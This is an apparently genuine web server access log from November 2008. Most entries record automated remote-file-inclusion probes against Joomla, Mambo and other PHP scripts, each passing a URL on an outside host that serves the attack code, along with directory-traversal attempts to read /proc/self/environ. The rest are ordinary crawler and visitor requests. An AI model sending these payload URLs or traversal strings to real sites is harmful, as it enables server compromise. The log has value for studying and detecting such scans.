62.87.154.41 - - [02/Nov/2008:21:33:21 -0600] "GET /logs//components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:21:33:22 -0600] "GET //components/com_flyspray/startdown.php?file=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
66.40.52.30 - - [02/Nov/2008:21:33:53 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:21:33:53 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.800"
77.221.151.34 - - [02/Nov/2008:21:34:21 -0600] "GET /logs/access_log.1208304000//skin/zero_vote/ask_password.php?dir=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
77.221.151.34 - - [02/Nov/2008:21:34:21 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
77.221.151.34 - - [02/Nov/2008:21:34:21 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
66.147.239.184 - - [02/Nov/2008:21:35:06 -0600] "GET /logs/access_log.1216425600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.810"
66.147.239.184 - - [02/Nov/2008:21:35:06 -0600] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
66.147.239.184 - - [02/Nov/2008:21:35:06 -0600] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
24.41.95.132 - - [02/Nov/2008:21:35:42 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://you-buy-viagra.com/files/idv6.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
24.41.95.132 - - [02/Nov/2008:21:35:42 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://you-buy-viagra.com/files/idv6.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
119.63.194.102 - - [02/Nov/2008:21:37:33 -0600] "GET /logs/access_log.1204761600 HTTP/1.1" 304 - "-""Baiduspider+(+http://help.baidu.jp/system/05.html)"
216.246.55.229 - - [02/Nov/2008:21:39:11 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
216.246.55.229 - - [02/Nov/2008:21:39:11 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
65.18.169.40 - - [02/Nov/2008:21:39:33 -0600] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
65.18.169.40 - - [02/Nov/2008:21:39:33 -0600] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
216.139.67.116 - - [02/Nov/2008:21:40:03 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.64"
216.139.67.116 - - [02/Nov/2008:21:40:04 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.64"
200.140.135.93 - - [02/Nov/2008:21:41:19 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
200.140.135.93 - - [02/Nov/2008:21:41:19 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
202.53.141.2 - - [02/Nov/2008:21:41:43 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
202.53.141.2 - - [02/Nov/2008:21:41:43 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
88.84.145.169 - - [02/Nov/2008:21:42:02 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
88.84.145.169 - - [02/Nov/2008:21:42:02 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:21:42:05 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:21:42:05 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
207.58.140.237 - - [02/Nov/2008:21:44:40 -0600] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
207.58.140.237 - - [02/Nov/2008:21:44:40 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
207.58.140.237 - - [02/Nov/2008:21:44:40 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
216.246.55.229 - - [02/Nov/2008:21:46:27 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
216.246.55.229 - - [02/Nov/2008:21:46:27 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
216.246.55.229 - - [02/Nov/2008:21:46:39 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
216.246.55.229 - - [02/Nov/2008:21:46:40 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
66.120.7.147 - - [02/Nov/2008:21:47:48 -0600] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
66.120.7.147 - - [02/Nov/2008:21:47:59 -0600] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
66.120.7.147 - - [02/Nov/2008:21:47:59 -0600] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
66.120.7.147 - - [02/Nov/2008:21:47:59 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.144.158.163 - - [02/Nov/2008:21:50:48 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
202.144.158.163 - - [02/Nov/2008:21:50:50 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
78.111.80.12 - - [02/Nov/2008:21:52:12 -0600] "GET /logs/access_log.1208304000//skin/zero_vote/ask_password.php?dir=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
78.111.80.12 - - [02/Nov/2008:21:52:12 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
78.111.80.12 - - [02/Nov/2008:21:52:13 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.200.50.225 - - [02/Nov/2008:21:53:42 -0600] "GET /logs/access_log.1216166400 HTTP/1.1" 206 581190 "-""Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
89.218.85.18 - - [02/Nov/2008:21:53:50 -0600] "GET /logs/access_log.1208304000//skin/zero_vote/ask_password.php?dir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
89.218.85.18 - - [02/Nov/2008:21:53:50 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
89.218.85.18 - - [02/Nov/2008:21:53:50 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
66.120.7.147 - - [02/Nov/2008:21:54:21 -0600] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
62.87.154.41 - - [02/Nov/2008:21:56:17 -0600] "GET /logs/access_log.1208044800//skin/zero_vote/ask_password.php?dir=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:21:56:18 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
62.87.154.41 - - [02/Nov/2008:21:56:33 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hayatiksirim.com/forum/shebbnohawk.txt%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
65.55.25.136 - - [02/Nov/2008:21:57:05 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.136 - - [02/Nov/2008:21:57:06 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.140.135.93 - - [02/Nov/2008:21:57:28 -0600] "GET /logs/access_log.1214179200%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://200.113.126.76/ids.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
212.227.60.81 - - [02/Nov/2008:21:57:51 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [02/Nov/2008:21:57:52 -0600] "GET /logs/?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 105501 "-""XXXXXX"
212.227.60.81 - - [02/Nov/2008:21:57:52 -0600] "GET /logs/?DOCUMENT_ROOT=http://clusty.com/search??? HTTP/1.1" 200 105501 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [02/Nov/2008:21:57:53 -0600] "GET /logs/?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 105501 "-""XXXXXX"
212.227.60.81 - - [02/Nov/2008:21:57:54 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [02/Nov/2008:21:57:54 -0600] "GET /?DOCUMENT_ROOT=http://clusty.com/search??? HTTP/1.1" 200 1243 "-""Avant Browser (http://www.avantbrowser.com)"
212.227.60.81 - - [02/Nov/2008:21:57:54 -0600] "GET /?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1243 "-""XXXXXX"
212.227.60.81 - - [02/Nov/2008:21:57:55 -0600] "GET /?DOCUMENT_ROOT=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1243 "-""XXXXXX"
200.140.135.93 - - [02/Nov/2008:21:58:08 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
200.140.135.93 - - [02/Nov/2008:21:58:08 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
200.140.135.93 - - [02/Nov/2008:21:58:08 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
75.209.76.112 - - [02/Nov/2008:21:58:40 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?client=safari&rls=en-us&q=vintage+tattoo+flash&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
75.209.76.112 - - [02/Nov/2008:21:58:40 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
75.209.76.112 - - [02/Nov/2008:21:58:40 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
75.209.76.112 - - [02/Nov/2008:21:58:40 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
202.53.141.2 - - [02/Nov/2008:21:59:19 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
202.53.141.2 - - [02/Nov/2008:21:59:19 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
202.53.141.2 - - [02/Nov/2008:21:59:19 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
216.139.67.116 - - [02/Nov/2008:22:00:57 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.64"
216.139.67.116 - - [02/Nov/2008:22:00:57 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.64"
195.12.53.176 - - [02/Nov/2008:22:02:38 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.12.53.176 - - [02/Nov/2008:22:02:38 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
88.84.145.169 - - [02/Nov/2008:22:03:12 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
88.84.145.169 - - [02/Nov/2008:22:03:12 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
200.93.147.155 - - [02/Nov/2008:22:03:18 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
200.93.147.155 - - [02/Nov/2008:22:03:18 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
24.41.95.132 - - [02/Nov/2008:22:04:10 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://you-buy-viagra.com/files/idv6.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
24.41.95.132 - - [02/Nov/2008:22:04:10 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://you-buy-viagra.com/files/idv6.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
65.55.25.136 - - [02/Nov/2008:22:04:13 -0600] "GET /costume/index1.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.136 - - [02/Nov/2008:22:04:14 -0600] "GET /costume/thmb3.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
213.189.20.26 - - [02/Nov/2008:22:05:32 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
213.189.20.26 - - [02/Nov/2008:22:05:32 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
213.189.20.26 - - [02/Nov/2008:22:05:32 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
213.189.20.26 - - [02/Nov/2008:22:05:33 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
65.18.169.40 - - [02/Nov/2008:22:13:03 -0600] "GET /logs/access_log.1216425600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
87.106.16.18 - - [02/Nov/2008:22:23:57 -0600] "GET /logs/access_log.1212883200%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 385 "-""Mozilla/5.0"
87.106.16.18 - - [02/Nov/2008:22:23:57 -0600] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
154.5.252.194 - - [02/Nov/2008:22:23:58 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
154.5.252.194 - - [02/Nov/2008:22:23:58 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.neocron-stars.de/iftmpscks.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.149.69.97 - - [02/Nov/2008:22:27:51 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
83.149.69.97 - - [02/Nov/2008:22:27:51 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
83.149.69.97 - - [02/Nov/2008:22:28:56 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
83.149.69.97 - - [02/Nov/2008:22:28:56 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
208.80.194.37 - - [02/Nov/2008:22:31:28 -0600] "GET / HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {4E14216B-6796-3DCE-51CE-E3B8E5C5C472})"
207.58.140.237 - - [02/Nov/2008:22:31:45 -0600] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
207.58.140.237 - - [02/Nov/2008:22:31:45 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
207.58.140.237 - - [02/Nov/2008:22:31:46 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
213.171.225.234 - - [02/Nov/2008:22:32:27 -0600] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
213.171.225.234 - - [02/Nov/2008:22:32:27 -0600] "GET ///vwar/backup/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
213.171.225.234 - - [02/Nov/2008:22:32:28 -0600] "GET /logs///vwar/backup/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
83.149.69.97 - - [02/Nov/2008:22:34:38 -0600] "GET /logs//adminhead.php?path[docroot]=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
83.149.69.97 - - [02/Nov/2008:22:34:39 -0600] "GET //adminhead.php?path[docroot]=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
83.149.69.97 - - [02/Nov/2008:22:34:58 -0600] "GET /logs//adminhead.php?path[docroot]=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
83.149.69.97 - - [02/Nov/2008:22:34:58 -0600] "GET //adminhead.php?path[docroot]=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.171.190.140 - - [02/Nov/2008:22:38:25 -0600] "GET /logs/access_log.1207180800///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/id2? HTTP/1.1" 404 374 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
202.171.190.140 - - [02/Nov/2008:22:38:25 -0600] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/id2? HTTP/1.1" 404 347 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
202.171.190.140 - - [02/Nov/2008:22:39:33 -0600] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/ididon?? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
202.171.190.140 - - [02/Nov/2008:22:39:33 -0600] "GET /logs/access_log.1207180800///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/ididon?? HTTP/1.1" 404 374 "-""libwww-perl/5.808"
202.171.190.140 - - [02/Nov/2008:22:39:34 -0600] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/ididon?? HTTP/1.1" 404 352 "-""libwww-perl/5.808"
83.149.69.97 - - [02/Nov/2008:22:40:08 -0600] "GET /logs//adminhead.php?path[docroot]=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
83.149.69.97 - - [02/Nov/2008:22:40:08 -0600] "GET //adminhead.php?path[docroot]=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.171.190.140 - - [02/Nov/2008:22:41:12 -0600] "GET /logs/access_log.1208304000///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/ididon?? HTTP/1.1" 404 374 "-""libwww-perl/5.808"
78.111.80.12 - - [02/Nov/2008:22:41:22 -0600] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
78.111.80.12 - - [02/Nov/2008:22:41:22 -0600] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
